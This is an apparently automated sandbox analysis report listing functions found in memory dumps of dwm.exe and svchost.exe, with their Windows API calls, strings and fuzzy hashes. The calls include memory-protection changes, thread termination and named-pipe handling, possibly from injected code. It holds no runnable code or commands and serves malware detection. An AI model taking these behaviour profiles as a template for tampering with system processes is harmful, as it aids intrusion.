StrCpyW.SHLWAPI ref: 0000021091921A86
CloseHandle.KERNEL32 ref: 0000021091921A94

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 544a001bc17c8a074d2ba60f546d1d16874480ed0833a724eb90c854c2e9cf21
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 29018031300A4296FB10DB52A4AC39963A1F798FE5F488435CEAA43755DEBCCEC6C300

Function 00000210919237AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000210919237C8
GetCurrentProcess.KERNEL32 ref: 00000210919237D6
VirtualProtectEx.KERNEL32 ref: 00000210919237F8
GetCurrentProcess.KERNEL32 ref: 0000021091923819
VirtualProtectEx.KERNEL32 ref: 000002109192383A
TerminateThread.KERNEL32 ref: 0000021091923849

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 1723ab30fbc6ca956b5fa8a64ae79f70cbddb19cdf87dbecd360d5421ccda8e5
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 5111407571174192FB249B21E4AD79AA7B0FB68FA1F040424CE6947756EFBCCA8AC700

Function 00000210919290D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000021091929103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000021091929198
RtlUnwindEx.NTDLL ref: 00000210919291E7

Strings

f, xrefs: 0000021091929116
csm, xrefs: 000002109192917E

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 50dcb5c867fdc169f1c3eff42e3396302698b04760953b7628ac91b69e87c7c0
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 0551F732311620AAEB14CF19E49CB993795F365FE8F608924DE264778ADBB5DDC1C700

Function 0000021091921AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000021091921AD8
StrCmpNIW.SHLWAPI ref: 0000021091921AF2
lstrlenW.KERNEL32 ref: 0000021091921B01
StrCpyW.SHLWAPI ref: 0000021091921B16

Strings

\\?\, xrefs: 0000021091921AE6

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: d1166d603c3cfece350a963860959b808ad657998284aa80cc330182719e5632
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 45F04F32304642A2EB208B61F5E83996770F764FA8F848030CA594695ADFBCCBC9CB00

Function 0000021091923200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000021091923222
StrCpyW.SHLWAPI ref: 0000021091923232
StrCatW.SHLWAPI ref: 000002109192323E
PathCombineW.SHLWAPI ref: 000002109192324C

Strings

\\.\pipe\, xrefs: 0000021091923218

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 4e3a6c7160c431a74e5e44b19b3c48d13eeec28afc42094b040b93330e43ce50
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 29F08230304B8191EA048B13B9A81996221FB58FF1F088131DE6A47B2ACE7CCAC6C300

Function 000002109192A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002109192A154
GetProcAddress.KERNEL32 ref: 000002109192A16A
FreeLibrary.KERNEL32 ref: 000002109192A187

Strings

mscoree.dll, xrefs: 000002109192A14B
CorExitProcess, xrefs: 000002109192A163

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: ec66d2b3893e2844ebc16da48d1de85090d19c9f36f610941f68e5bf392567db
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 2CF05E72321745A1FF444B60E8E83A42360AB68FF1F442419952B46AA3CFB8CDC9C700

Function 0000021091930860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000210919308A2
GetConsoleMode.KERNEL32 ref: 0000021091930960
GetLastError.KERNEL32 ref: 00000210919309EA

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 31841c339278f632600d6afd497cb2dd3ad2ecdbfbd7933d9c7ca1d04d2422ad
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 7E81B03271065099FB509F6598EC3ED26A0F764FA8F484216DE2A93797DBB48CC7C311

Function 00000210919257F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000021091925806

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction ID: 464820291cfa84728ad738b5f1f58017f39c941dbfeded35d43c076f9548164e
Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction Fuzzy Hash: F961EC36719B40D6F7609B15E4A839AB7E0F398B64F500515FA9D87BA9CBBCC881CF01

Function 00000210919012B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000210919012E0
_set_statfp.LIBCMT ref: 00000210919012FB
_set_statfp.LIBCMT ref: 0000021091901317
_set_statfp.LIBCMT ref: 0000021091901353

Memory Dump Source

Source File: 00000020.00000002.2720012814.00000210918F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_210918f0000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: c59f20bed69a96e9c31a81fdf3bd899735f5239f0f3c4ab46c7b9c84fddec39e
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: C2115132B54A0142F7641169E5FE3E912816B7FB7CE484634AA7746AD78AB8DCC15104

Function 0000021091931EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000021091931EE0
_set_statfp.LIBCMT ref: 0000021091931EFB
_set_statfp.LIBCMT ref: 0000021091931F17
_set_statfp.LIBCMT ref: 0000021091931F53

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 18c9102708a8acf1f29e2214a41b50f52b1691f136fb9774f14c3f7806ea087a
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 3C115132B54A0502F6A82165E4FE3E61041EB74BBCE544635AA77062FF8BF48CC35114

Function 00000210919712B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000210919712E0
_set_statfp.LIBCMT ref: 00000210919712FB
_set_statfp.LIBCMT ref: 0000021091971317
_set_statfp.LIBCMT ref: 0000021091971353

Memory Dump Source

Source File: 00000020.00000002.2720175538.0000021091960000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021091960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091960000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 581897727a4dbd71ae1103e8d05168d2d7a46c5230efff87fca2695463b79c1e
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 01117332B74A0103F6A82165E9FE3E911916F74F7CF584634AA7706BD78AF88CC14104

Function 00000210918F84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000210918F8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000210918F8598

Strings

csm, xrefs: 00000210918F857E
f, xrefs: 00000210918F8516

Memory Dump Source

Source File: 00000020.00000002.2720012814.00000210918F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_210918f0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: d40808484883a4373ccf7cc51a8f4c451bf96d4afb0ffbbf2431bc053c2be763
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 1551C6327116008BDB14CF15D6ACB9A3395F366FA8F518124DA164B74AEBB8DCC3D784

Function 00000210919684F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000021091968503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000021091968598

Strings

csm, xrefs: 000002109196857E
f, xrefs: 0000021091968516

Memory Dump Source

Source File: 00000020.00000002.2720175538.0000021091960000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021091960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091960000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: cbe0cdc3cf6d59a4f2df9f66f377e59e4f6caf7541add2ae7883a7793d8e8868
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 1051BD723227008AEB14CF25E4A8B983395F364FECF558125DA064378ADBB4CCC18724

Function 00000210918F84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000210918F8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000210918F8598

Strings

csm, xrefs: 00000210918F857E
f, xrefs: 00000210918F8516

Memory Dump Source

Source File: 00000020.00000002.2720012814.00000210918F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_210918f0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: b650dfe73e0f79dbbf5bc0ff03f8282a35195bbda664c1e487fcaf6daa6da130
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 9431CF3130164087E710DF11E9AC79A37A4F36AFE8F058114AE5A0B74ACBB8CD83D744

Function 00000210919684D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000021091968503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000021091968598

Strings

csm, xrefs: 000002109196857E
f, xrefs: 0000021091968516

Memory Dump Source

Source File: 00000020.00000002.2720175538.0000021091960000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021091960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091960000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 77ce77f02f5f55956f2c546683ba7ac29120d244684781848694dba0736b2f36
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 7F319F7232174096E714DF11E8E879977A4F764FECF158014AE5A0778ACBB8CD81CB14

Function 00000210919214B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000210919214D5
HeapFree.KERNEL32 ref: 00000210919214E4
GetProcessHeap.KERNEL32 ref: 00000210919214F0
HeapFree.KERNEL32 ref: 00000210919214FF
GetProcessHeap.KERNEL32 ref: 000002109192152A

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: c4c546ded3d583be7131fe16d99978c09bd67d15506ccea1d26443a4d3e34eb6
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: 83114F31714B8492EB549FA6A49825A7370F399F94F044125DBAA03716DF7CC9928700

Function 00000210919226F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000210919227D4
StrCpyW.SHLWAPI ref: 00000210919227ED

Strings

\\.\pipe\, xrefs: 00000210919227DF

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 9e457bdad73d43d793c5f89e31f5f366e9c4d67f3eb729a9d993e36ca4678f86
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: F671063630078162EB34DF2599E83EA6390F769FE4F444816DD6943B8ADEB4CE84C740

Function 00000210919224DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000210919225C3
StrCpyW.SHLWAPI ref: 00000210919225DA

Strings

\\.\pipe\, xrefs: 00000210919225CE

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 3252d7d82eade7bb70f931ea134ee22e5551bcb49381585218e95f7e71f5a823
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 8051ED3330478161E6349E2595FC3EE6791F3A5FA0F444826DD6607B9BCEBACD858B40

Function 0000021091930604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002109193071B
GetLastError.KERNEL32 ref: 000002109193073D

Strings

U, xrefs: 00000210919306C7

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 959a167cda9098b06134c73e26144bb256351edc57c887724afc16ed481f104c
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 1C41D672315A4091EB209F25E8983DEB7A0F3A8FE4F544121EE5E87759DB7CC982CB40

Function 000002109192D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002109192D6F9
LCMapStringW.KERNEL32 ref: 000002109192D781

Strings

LCMapStringEx, xrefs: 000002109192D6DC, 000002109192D6ED

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: ab896855126c47145d5d6e455071f3f64858ddaba226c0b65f7da5fc9c8f896e
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: E8114D36308BC086DB60CB15F49439AB7A4F7D9BA0F544126EE9D83B1ADF78C981CB00

Function 00000210919294A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000210919294E8
RaiseException.KERNEL32 ref: 000002109192952E

Strings

csm, xrefs: 000002109192951B

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: c6483a9f1a9045938499a3595ad6a9aba04f65e30559a879d615241cbb050b30
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 9F114C32309B9092EB608F15F49429977A0F798FA8F588620DF9D07B69DF78C991CB00

Function 000002109192D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002109192D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002109192D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002109192D681

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 34d8d8f28422205113c210bdedb6b06355d0473da5ab90f6d9f9d5746ef9bbc1
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 39F0823131078091FB159B41F4AC7D56361EB98FB0F495425A97903B56CEB8CDD6C700

Function 00000210918FCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000210918FCBC5

Strings

October, xrefs: 00000210918FCBBE
November, xrefs: 00000210918FCBA8, 00000210918FCBB2

Memory Dump Source

Source File: 00000020.00000002.2720012814.00000210918F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000210918F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_210918f0000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 9a4546ef6d60ccff99c333f882cb4fedab24eb15c10d6ddbab89241bd38521a3
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 97E0923130454592EB459B51F4EC7E62221ABBCF60F59502195290B353CFBCDDC7A380

Function 000002109192D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002109192D631
TlsSetValue.KERNEL32 ref: 000002109192D648

Strings

FlsSetValue, xrefs: 000002109192D61E

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 0191f9d1014cf17d50c2d09141de6b053131736a77fba05015f3a37094f51bc2
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 41E06D71300641A1EE154B50F8AC7D52262ABA8FA0F499022D93907357CEB8CDDAC700

Function 000002109196CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002109196CBC5

Strings

October, xrefs: 000002109196CBBE
November, xrefs: 000002109196CBA8, 000002109196CBB2

Memory Dump Source

Source File: 00000020.00000002.2720175538.0000021091960000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021091960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091960000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 365d4ced8742def2d47c5d817a21d1986aef86b722f5cb4eeebddfcc64e4fa2b
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 70E0923132154192FB06AB51F4E83E86321AFB8FE0F595022A52907693CFB8DCC6C310

Function 0000021091921D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000021091921D9B
HeapAlloc.KERNEL32 ref: 0000021091921DAA
GetProcessHeap.KERNEL32 ref: 0000021091921E1E
HeapFree.KERNEL32 ref: 0000021091921E2C

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 7eb445a682f3cf4fc403fab693ee02b33b1a5111b6640fad3f6a5f611ac9079b
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 1521A732704B8091EF118F59E4582DAF3A0FB94FA8F154520DE9D47B16EFB8C9928700

Function 0000021091921274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002109192127A
HeapAlloc.KERNEL32 ref: 0000021091921289
GetProcessHeap.KERNEL32 ref: 00000210919212A3
HeapAlloc.KERNEL32 ref: 00000210919212B4

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 672bba82970d52ba3d38f3cf3f6dcb1d84d4b421665fa5f64d085f877e613e82
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: BDE06D7175160186E7048FA2D86838936F1FB98F22F48C024CD1907351DFBDC9DAC740

Analysis Process: svchost.exePID: 360, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 000002062E991650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002062E99165B
HeapAlloc.KERNEL32 ref: 000002062E99166A

Part of subcall function 000002062E991274: GetProcessHeap.KERNEL32 ref: 000002062E99127A
Part of subcall function 000002062E991274: HeapAlloc.KERNEL32 ref: 000002062E991289
Part of subcall function 000002062E991274: GetProcessHeap.KERNEL32 ref: 000002062E9912A3
